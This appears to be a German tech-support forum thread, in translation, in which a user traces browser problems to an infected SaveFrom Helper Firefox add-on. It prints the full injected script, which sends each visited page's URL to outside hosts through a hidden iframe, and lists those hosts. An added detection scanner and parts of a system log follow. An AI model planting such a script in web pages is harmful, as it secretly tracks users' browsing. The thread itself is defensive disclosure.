Description: Programm Explorer.EXE, Version 6.3.9600.17667 kann nicht mehr unter Windows ausgeführt werden und wurde beendet. Überprüfen Sie den Problemverlauf in der Wartungscenter-Systemsteuerung, um nach weiteren Informationen zum Problem zu suchen.

Prozess-ID: 3244

Startzeit: 01d0984381d9292a

Endzeit: 0

Anwendungspfad: C:\WINDOWS\Explorer.EXE

Berichts-ID: e577004d-0436-11e5-be8e-a41731ec29e8

Vollständiger Name des fehlerhaften Pakets: 

Anwendungs-ID, die relativ zum fehlerhaften Paket ist:

Error: (05/27/2015 08:10:37 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Resetting to Probing:   16 RubensVaio.local. AAAA FE80:0000:0000:0000:D1B2:D6F0:4F33:2936

Error: (05/27/2015 08:10:37 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Received from 192.168.2.106:5353   16 RubensVaio.local. AAAA 2003:004B:2F48:B101:504C:4163:02A7:8478

Error: (05/27/2015 08:10:37 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Resetting to Probing:   16 RubensVaio.local. AAAA 2003:004B:2F48:B101:7887:BBF0:964A:28D6

Error: (05/27/2015 08:10:37 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Received from 192.168.2.106:5353   16 RubensVaio.local. AAAA 2003:004B:2F48:B101:504C:4163:02A7:8478

Error: (05/27/2015 08:10:37 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Resetting to Probing:   16 RubensVaio.local. AAAA 2003:004B:2F48:B101:D1B2:D6F0:4F33:2936

Error: (05/27/2015 08:10:37 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Received from 192.168.2.106:5353   16 RubensVaio.local. AAAA 2003:004B:2F48:B101:504C:4163:02A7:8478

Error: (05/27/2015 08:10:37 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Resetting to Probing:    4 RubensVaio.local. Addr 192.168.2.106

Error: (05/27/2015 08:10:37 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Received from 192.168.2.106:5353   16 RubensVaio.local. AAAA 2003:004B:2F48:B101:504C:4163:02A7:8478


System errors:
=============
Error: (05/26/2015 06:00:15 PM) (Source: NetBT) (EventID: 4321) (User: )
Description: Der Name "WORKGROUP      :1d" konnte nicht auf der Schnittstelle mit IP-Adresse 192.168.2.106
registriert werden. Der Computer mit IP-Adresse 192.168.2.102 hat nicht
zugelassen, dass dieser Computer diesen Namen verwendet.

Error: (05/26/2015 05:56:06 PM) (Source: DCOM) (EventID: 10010) (User: RubensVaio)
Description: {1B1F472E-3221-4826-97DB-2C2324D389AE}

Error: (05/26/2015 05:55:35 PM) (Source: DCOM) (EventID: 10010) (User: RubensVaio)
Description: {BF6C1E47-86EC-4194-9CE5-13C15DCB2001}

Error: (05/24/2015 07:38:03 PM) (Source: DCOM) (EventID: 10010) (User: RubensVaio)
Description: {1B1F472E-3221-4826-97DB-2C2324D389AE}

Error: (05/24/2015 07:37:33 PM) (Source: DCOM) (EventID: 10010) (User: RubensVaio)
Description: {BF6C1E47-86EC-4194-9CE5-13C15DCB2001}

Error: (05/23/2015 03:23:45 PM) (Source: DCOM) (EventID: 10010) (User: RubensVaio)
Description: {1B1F472E-3221-4826-97DB-2C2324D389AE}

Error: (05/23/2015 03:23:15 PM) (Source: DCOM) (EventID: 10010) (User: RubensVaio)
Description: {BF6C1E47-86EC-4194-9CE5-13C15DCB2001}

Error: (05/23/2015 02:05:29 PM) (Source: DCOM) (EventID: 10010) (User: RubensVaio)
Description: {1B1F472E-3221-4826-97DB-2C2324D389AE}

Error: (05/23/2015 02:04:59 PM) (Source: DCOM) (EventID: 10010) (User: RubensVaio)
Description: {BF6C1E47-86EC-4194-9CE5-13C15DCB2001}

Error: (05/22/2015 06:13:01 PM) (Source: DCOM) (EventID: 10010) (User: RubensVaio)
Description: {BF6C1E47-86EC-4194-9CE5-13C15DCB2001}


Microsoft Office:
=========================
Error: (05/27/2015 08:15:21 AM) (Source: Windows Search Service) (EventID: 1019) (User: )
Description: 300x80040d07iehistory://{S-1-5-21-2798130160-1945478871-1923780282-1001}/

Error: (05/27/2015 08:11:53 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Explorer.EXE6.3.9600.17667324401d0984381d9292a0C:\WINDOWS\Explorer.EXEe577004d-0436-11e5-be8e-a41731ec29e8

Error: (05/27/2015 08:10:37 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Resetting to Probing:   16 RubensVaio.local. AAAA FE80:0000:0000:0000:D1B2:D6F0:4F33:2936

Error: (05/27/2015 08:10:37 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Received from 192.168.2.106:5353   16 RubensVaio.local. AAAA 2003:004B:2F48:B101:504C:4163:02A7:8478

Error: (05/27/2015 08:10:37 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Resetting to Probing:   16 RubensVaio.local. AAAA 2003:004B:2F48:B101:7887:BBF0:964A:28D6

Error: (05/27/2015 08:10:37 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Received from 192.168.2.106:5353   16 RubensVaio.local. AAAA 2003:004B:2F48:B101:504C:4163:02A7:8478

Error: (05/27/2015 08:10:37 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Resetting to Probing:   16 RubensVaio.local. AAAA 2003:004B:2F48:B101:D1B2:D6F0:4F33:2936

Error: (05/27/2015 08:10:37 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Received from 192.168.2.106:5353   16 RubensVaio.local. AAAA 2003:004B:2F48:B101:504C:4163:02A7:8478

Error: (05/27/2015 08:10:37 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Resetting to Probing:    4 RubensVaio.local. Addr 192.168.2.106

Error: (05/27/2015 08:10:37 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Received from 192.168.2.106:5353   16 RubensVaio.local. AAAA 2003:004B:2F48:B101:504C:4163:02A7:8478


==================== Memory info =========================== 

Processor: Intel(R) Core(TM) i7-3630QM CPU @ 2.40GHz
Percentage of memory in use: 66%
Total physical RAM: 8139.28 MB
Available physical RAM: 2732.42 MB
Total Pagefile: 11979.28 MB
Available Pagefile: 4991.53 MB
Total Virtual: 131072 MB
Available Virtual: 131071.77 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:1825.12 GB) (Free:1750.36 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 1863 GB) (Disk ID: 95F2A7AC)

Partition: GPT Partition Type.

==================== End of log ============================
         
The other files are attached (character limit). I could not upload Gmer.txt anywhere, it is 500 KB in size, so it is on GitHub Gist: https://gist.github.com/RAnders00/5b2008f44e08912ac196
Attached files
File type: log defogger_disable.log (472 bytes, viewed 74 times)
File type: txt FRST.txt (62.2 KB, viewed 135 times)

Edited by RAnders00 (27.05.2015 at 11:15)

27.05.2015, 11:04   #2
schrauber
/// the machine
/// TB-Ausbilder

Hi,

Please always post logs in code tags in the thread.

30.05.2015, 14:36   #3
RAnders00

I found the solution.

I had an apparently infected version of the Firefox add-on "SaveFrom Helper". I removed the add-on, restarted Firefox, downloaded the add-on again from the official Mozilla add-on site, and the problem promptly disappeared.

The add-on had injected JavaScript and frames into the pages. The sites that appeared in the scripts and frames were: (for future users searching on Google)

Code:
i.mgicinjs.info
foxi69.tlscdn.com
f.asdfzxcv1312.com
endall41-q.apollocdn.com
q.nadijs.info
f.asdfzxcv1312.com
q.mgicinjs.info
         
In addition, the following script was injected into the head section of the page: (expand for sensible line breaks)
Code:
(function(){try{if(typeof window['asdfdsasdfdsa'] === 'undefined'){setTimeout(function(){var shouldThisPartOfCodeRun = document.URL.search('http') === 0 ;if(!shouldThisPartOfCodeRun){	return;}if(typeof DealPly !== 'undefined' && typeof DealPly.serverCallParam === 'string'  ){var reportFlag = true;var scArr = document.getElementsByTagName('script');for(var index in scArr){if(typeof scArr[index].src === 'string' && scArr[index].src.search('\\.js\\?dn=') !== -1){	reportFlag = false;}}if(!reportFlag ){	return;}var host = 'hxxp://q.nadijs.info/';var isSecure =  document.URL.search('https://') === 0 ;if(isSecure){	host = 'https://endall41-q.apollocdn.com/';}var urlPath = 'dealdo/event-report?type=quick&';var iframe = document.createElement('iframe');var suffix = ''; try{if(typeof JavaScriptJsTagUrl !== 'undefined'){suffix = JavaScriptJsTagUrl.substr(JavaScriptJsTagUrl.search('\?') + 1 );}}catch(e324324){}iframe.setAttribute('style','position:relative; left:-10000px; width:1px; height:1px; visibility:hidden');iframe.setAttribute('src',host + urlPath + 'url=' + encodeURIComponent(document.URL) + '&domain=' + document.domain   + '&topic=dpdiedarg&' + suffix );document.body.appendChild(iframe);}}, 10000);window['asdfdsasdfdsa'] = true;} }catch(e235534){}})();
         
Dear moderators, this topic can now be closed. I have also tidied up and added to the tags for better indexing.

FOR ENGLISH VISITORS:
You have an infected version of the SaveFrom Helper installed. Uninstall it and get a non-infected version from the official Mozilla add-on website.

Edited by RAnders00 (30.05.2015 at 14:43)
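
The indicators from the post above, turned into a page check that flags script and iframe elements matching them. This is an added example, not part of the original thread: the hosts, the `dealdo/event-report` path and the `asdfdsasdfdsa` marker come from the post, while the function names, the element-descriptor shape, the `example.js` path and the sample elements are constructed for illustration.

```javascript
// Hosts the poster saw in the injected scripts and frames (from the post).
const REPORTED_HOSTS = new Set([
  'i.mgicinjs.info',
  'foxi69.tlscdn.com',
  'f.asdfzxcv1312.com',
  'endall41-q.apollocdn.com',
  'q.nadijs.info',
  'q.mgicinjs.info',
]);
const REPORT_PATH = 'dealdo/event-report'; // path requested by the injected script
const MARKER_GLOBAL = 'asdfdsasdfdsa';     // window flag the injected script sets

// Indicators are often shared defanged (hxxp://, [.]); make them parseable again.
function refang(url) {
  return url.replace(/^hxxp/i, 'http').replace(/\[\.\]/g, '.');
}

// Parse an inline style attribute into a lowercase property map.
function parseStyle(style) {
  const map = {};
  for (const decl of (style || '').split(';')) {
    const i = decl.indexOf(':');
    if (i > 0) {
      map[decl.slice(0, i).trim().toLowerCase()] = decl.slice(i + 1).trim().toLowerCase();
    }
  }
  return map;
}

// The injected iframe hides itself: far off-screen, 1px in size, visibility hidden.
// Hidden frames also occur legitimately, so treat this as supporting evidence only.
function isHiddenFrame(style) {
  const s = parseStyle(style);
  const offscreen = /^-\d{4,}px$/.test(s.left || '') || /^-\d{4,}px$/.test(s.top || '');
  const tiny = ['0', '0px', '1px'].includes(s.width) && ['0', '0px', '1px'].includes(s.height);
  const invisible = s.visibility === 'hidden' || s.display === 'none';
  return offscreen || tiny || invisible;
}

// Return the list of reasons one element looks like part of the injection.
function inspectElement(el) {
  const reasons = [];
  let url = null;
  try {
    url = new URL(refang(el.src || ''));
  } catch (e) {
    // empty or relative src: nothing to compare against the host list
  }
  if (url) {
    const host = url.hostname.toLowerCase();
    if (REPORTED_HOSTS.has(host)) reasons.push('reported-host:' + host);
    if (url.pathname.includes(REPORT_PATH)) reasons.push('report-path');
  }
  if (el.tag.toLowerCase() === 'iframe' && isHiddenFrame(el.style)) {
    reasons.push('hidden-iframe');
  }
  return reasons;
}

// Scan element descriptors plus the page's global object (window in a browser).
function scanPage(elements, globals) {
  const findings = [];
  elements.forEach((el, index) => {
    const reasons = inspectElement(el);
    if (reasons.length) findings.push({ index, tag: el.tag, src: el.src, reasons });
  });
  if (globals && Object.prototype.hasOwnProperty.call(globals, MARKER_GLOBAL)) {
    findings.push({ index: -1, tag: 'window', src: null, reasons: ['marker-global'] });
  }
  return findings;
}

// In a browser console: scanPage(collectFromDocument(document), window)
function collectFromDocument(doc) {
  return Array.from(doc.querySelectorAll('iframe, script')).map((n) => ({
    tag: n.tagName,
    src: n.getAttribute('src') || '',
    style: n.getAttribute('style') || '',
  }));
}

// Constructed sample input (defanged), modelled on what the post describes.
const SAMPLE_ELEMENTS = [
  { tag: 'script', src: 'https://www.example.org/static/app.js', style: '' },
  { tag: 'script', src: 'hxxp://i.mgicinjs.info/example.js', style: '' },
  {
    tag: 'iframe',
    src: 'hxxps://endall41-q.apollocdn.com/dealdo/event-report?type=quick&url=https%3A%2F%2Fwww.example.org%2F',
    style: 'position:relative; left:-10000px; width:1px; height:1px; visibility:hidden',
  },
  { tag: 'iframe', src: 'https://www.example.org/embed/video', style: 'width:560px; height:315px' },
];
const SAMPLE_GLOBALS = { asdfdsasdfdsa: true };

console.log(JSON.stringify(scanPage(SAMPLE_ELEMENTS, SAMPLE_GLOBALS), null, 2));
```

The injected script waits 10 seconds before adding its iframe, so a check run in the browser right after page load can miss it.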

31.05.2015, 05:49   #4
schrauber
/// the machine
/// TB-Ausbilder

ok
__________________
Regards,
schrauber

Proud Member of UNITE and ASAP since 2009
